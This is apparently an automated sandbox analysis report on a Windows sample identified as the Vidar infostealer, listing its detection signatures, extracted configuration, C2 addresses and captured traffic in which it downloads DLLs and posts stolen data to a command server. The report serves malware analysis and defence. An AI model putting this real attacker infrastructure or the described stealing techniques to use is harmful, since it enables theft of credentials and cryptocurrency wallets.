Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1417473
MD5:	0ce3dc374e49433d7e15d02c015e0ee3
SHA1:	71882bb02d1fa7b4a0f824afdcc1cd53bdb85ba1
SHA256:	f714adc256ed7b0d48a50c9b10d0db1d6285541801e720569c86fceeba072697
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Country aware sample found (crashes after keyboard check)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://78.46.229.36/msvcp140.dllxE	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/Hos	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/U&	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/~&	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/mozglue.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/freebl3.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/ramData	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/nss3.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/mozglue.dll2E	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/p&	Avira URL Cloud: Label: malware
Source: https://78.46.229.36	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/msvcp140.dllnE	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/nes	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/softokn3.dllBE	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/d	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/sqlm.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/g	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/2	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/B	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "90027e35f6cb548480a6fb8bd7cde0cf", "Version": "8.7"}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 29%

Perma Link

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406EB0 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_00406EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409110 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,	3_2_00409110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004115E0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_004115E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406E30 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00406E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6C6E6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8AA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	3_2_6C8AA9A0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.112.44.153:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: mscorlib.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: Friendly.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: System.pdb4 source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: c:\nconvxoz3\obj\Release\Friendly.pdb source: file.exe
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: System.ni.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdb source: WERD260.tmp.dmp.6.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416310 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	3_2_00416310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004173B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004173B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00416B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040AF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416FA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00416FA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00416750 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

3_2_00416750

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199658817715

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 78.46.229.36 78.46.229.36
Source: Joe Sandbox View	IP Address: 104.112.44.153 104.112.44.153

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 7117Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 130713Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00404420 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_00404420

Source: global traffic	HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
